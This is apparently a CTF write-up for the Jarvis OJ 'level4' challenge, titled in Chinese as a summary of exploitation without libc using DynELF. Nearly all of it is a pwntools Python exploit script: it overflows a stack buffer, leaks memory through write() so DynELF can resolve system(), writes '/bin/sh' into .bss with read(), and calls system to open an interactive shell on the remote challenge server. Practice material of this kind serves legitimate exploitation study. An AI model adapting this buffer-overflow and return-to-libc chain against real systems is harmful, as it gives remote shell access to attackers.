Jarvis OJ-Level4

借助DynELF实现无libc的漏洞利用小结

#!/usr/bin/env python

# coding:utf-8

from pwn import *

elf = ELF('level4')

write_plt = p32(elf.symbols['write'])

start_addr = p32(elf.symbols['_start'])

read_plt = p32(elf.symbols['read'])

data_addr = p32(elf.symbols['__bss_start'])

junk = "A" * (0x88 + 4)

Io = remote("pwn2.jarvisoj.com", 9880)

def leak(addr):

    payload = junk + write_plt + start_addr + p32(1) + p32(addr) + p32(4)

    Io.send(payload)

    leaked = Io.recv(4)

    print "[%s] -> [%s] = [%s]" % (hex(addr), hex(u32(leaked)),  repr(leaked))

    return leaked


# leak the address of system()

d = DynELF(leak, elf=ELF("./level4"))

system_addr = d.lookup('system', 'libc')

print "[system()] -> [%s]" % (hex(system_addr))


# write /bin/sh

payload = junk + read_plt + start_addr + p32(0) + data_addr + p32(8)

Io.send(payload)


# send /bin/sh

Io.send("/bin/sh\x00")


# call system

#read_output()

payload = junk + p32(system_addr) + p32(0xFFFFFFFF) + data_addr

Io.send(payload)


# interactive()

Io.interactive()